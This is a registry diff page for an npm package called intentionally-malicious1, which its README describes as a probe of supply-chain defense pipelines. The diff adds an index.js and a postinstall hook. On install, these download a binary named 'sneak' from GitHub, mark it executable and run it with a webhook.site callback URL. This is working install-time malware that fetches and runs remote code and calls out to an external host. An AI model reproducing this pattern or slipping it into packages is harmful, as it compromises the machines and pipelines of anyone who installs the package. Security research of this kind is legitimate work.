intentionally-malicious1 0.0.1-security → 1.0.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of intentionally-malicious1 might be problematic. Click here for more details.
- package/README.md +5 -3
- package/index.js +24 -0
- package/package.json +12 -3
package/README.md
CHANGED
@@ -1,5 +1,7 @@
|
|
1
|
-
#
|
1
|
+
# Intentionally Malicious
|
2
2
|
|
3
|
-
This
|
3
|
+
This is a package wrapper of "malware" that executes inside supply chain defense pipelines to
|
4
|
+
test for SSRF opportunities, done by [@ex0dus-0x](https://codemuch.tech).
|
5
|
+
Please reach out to chat more if this entered your pipeline!
|
4
6
|
|
5
|
-
|
7
|
+
The original malware: https://github.com/ex0dus-0x/sneak
|
package/index.js
ADDED
@@ -0,0 +1,24 @@
|
|
1
|
+
const request = require('request');
|
2
|
+
const fs = require('fs');
|
3
|
+
const exec = require('child_process').exec;
|
4
|
+
|
5
|
+
const url = "https://github.com/ex0dus-0x/sneak/releases/download/prerelease/sneak"
|
6
|
+
const file = fs.createWriteStream("sneak");
|
7
|
+
request({
|
8
|
+
followAllRedirects: true,
|
9
|
+
url: url
|
10
|
+
}, function (error, response, body) {
|
11
|
+
request(url).pipe(file).on('close', function() {
|
12
|
+
console.log("done");
|
13
|
+
exec('chmod +x ./sneak && ./sneak -webhook=https://webhook.site/646059aa-6165-44dd-bc5b-143f0e13cdc3?', (err, stdout, stderr) => {
|
14
|
+
if (err) {
|
15
|
+
console.log(err);
|
16
|
+
return;
|
17
|
+
}
|
18
|
+
console.log(`stdout: ${stdout}`);
|
19
|
+
console.log(`stderr: ${stderr}`);
|
20
|
+
});
|
21
|
+
});
|
22
|
+
});
|
23
|
+
|
24
|
+
|
package/package.json
CHANGED
@@ -1,6 +1,15 @@
|
|
1
1
|
{
|
2
2
|
"name": "intentionally-malicious1",
|
3
|
-
"version": "
|
4
|
-
"description": "
|
5
|
-
"
|
3
|
+
"version": "1.0.1",
|
4
|
+
"description": "Definitely malware.",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
8
|
+
"postinstall": "node index.js"
|
9
|
+
},
|
10
|
+
"author": "Alan Cao <alcao758@gmail.com>",
|
11
|
+
"license": "ISC",
|
12
|
+
"dependencies": {
|
13
|
+
"request": "^2.88.2"
|
14
|
+
}
|
6
15
|
}
|